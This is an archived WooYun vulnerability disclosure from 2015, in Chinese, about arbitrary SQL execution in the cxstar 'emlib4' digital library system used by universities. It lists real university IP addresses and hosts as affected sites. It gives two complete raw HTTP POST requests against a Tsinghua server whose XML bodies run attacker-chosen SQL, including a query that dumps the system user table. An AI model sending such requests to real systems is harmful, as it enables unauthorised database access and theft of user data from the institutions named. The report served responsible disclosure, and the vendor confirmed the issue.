乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-04-07: 细节已通知厂商并且等待厂商处理中 2015-04-10: 厂商已经确认,细节仅向厂商公开 2015-04-13: 细节向第三方安全合作伙伴开放 2015-06-04: 细节向核心白帽子及相关领域专家公开 2015-06-14: 细节向普通白帽子公开 2015-06-24: 细节向实习白帽子公开 2015-07-09: 细节向公众公开
继上次继续发现多个页面存在任意SQL语句执行
影响众多学校:官网:
http://www.cxstar.cn/ 畅想之星
存在两处任意SQL语句执行漏洞:
1、 POST /emlib4/system/datasource/selectrecordset.aspx2、 POST /emlib4/system/DataSource/GetDataGridCtrlResult.aspx?_debug_=undefined
案例我就懒得找,直接取上次的了:
http://166.111.120.118/emlib4/format/release/aspx/eml_homepage.aspxhttp://202.112.181.252/emlib4/format/release/aspx/eml_homepage.aspxhttp://202.202.12.32/emlib4/format/release/aspx/eml_homepage.aspxhttp://202.120.143.35/emlib4/format/release/aspx/eml_homepage.aspxhttp://media.lib.sjtu.edu.cn/emlib4/format/release/aspx/eml_homepage.aspx
以清华大学的测试咯?http://166.111.120.118/emlib4/format/release/aspx/eml_homepage.aspx第一处:
POST /emlib4/system/datasource/selectrecordset.aspx HTTP/1.1Host: 166.111.120.118Proxy-Connection: keep-aliveContent-Length: 125Accept: text/javascript, text/html, application/xml, text/xml, */*X-Prototype-Version: 1.6.0.2Origin: http://166.111.120.118X-Requested-With: XMLHttpRequestUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.101 Safari/537.36Content-type: text/xml; charset=UTF-8Referer: http://166.111.120.118/emlib4/format/release/aspx/eml_homepage.aspxAccept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.8Cookie: ASP.NET_SessionId=ovam5c45jbbivw45cgkokz3v; desktopID=; userID=; departmentID=; userName=; postIDs=; publicFlag=; regInterval=30<Root><A3020>system</A3020><A3001>SELECT @@version</A3001><A3002 valueType="4">0</A3002><A3003 valueType="4">1</A3003></Root>
第二处:
POST /emlib4/system/DataSource/GetDataGridCtrlResult.aspx?_debug_=undefined HTTP/1.1Host: 166.111.120.118Proxy-Connection: keep-aliveContent-Length: 142Accept: text/javascript, text/html, application/xml, text/xml, */*X-Prototype-Version: 1.6.0.2Origin: http://166.111.120.118X-Requested-With: XMLHttpRequestUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.101 Safari/537.36Content-type: text/xml; charset=UTF-8Referer: http://166.111.120.118/emlib4/format/release/aspx/EML_INTENET_SY.aspxAccept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.8Cookie: ASP.NET_SessionId=ovam5c45jbbivw45cgkokz3v; desktopID=; userID=; departmentID=; userName=; postIDs=; publicFlag=; regInterval=30<Root><A3020>system</A3020><A3001>SELECT * from system_user_manage</A3001><A3002 valueType="4">0</A3002><A3003 valueType="4">15</A3003></Root>
危害等级:高
漏洞Rank:12
确认时间:2015-04-10 17:32
CNVD未直接复现所述情况,已经转由CNCERT下发给赛尔教育,由其后续协调网站管理单位处置。
暂无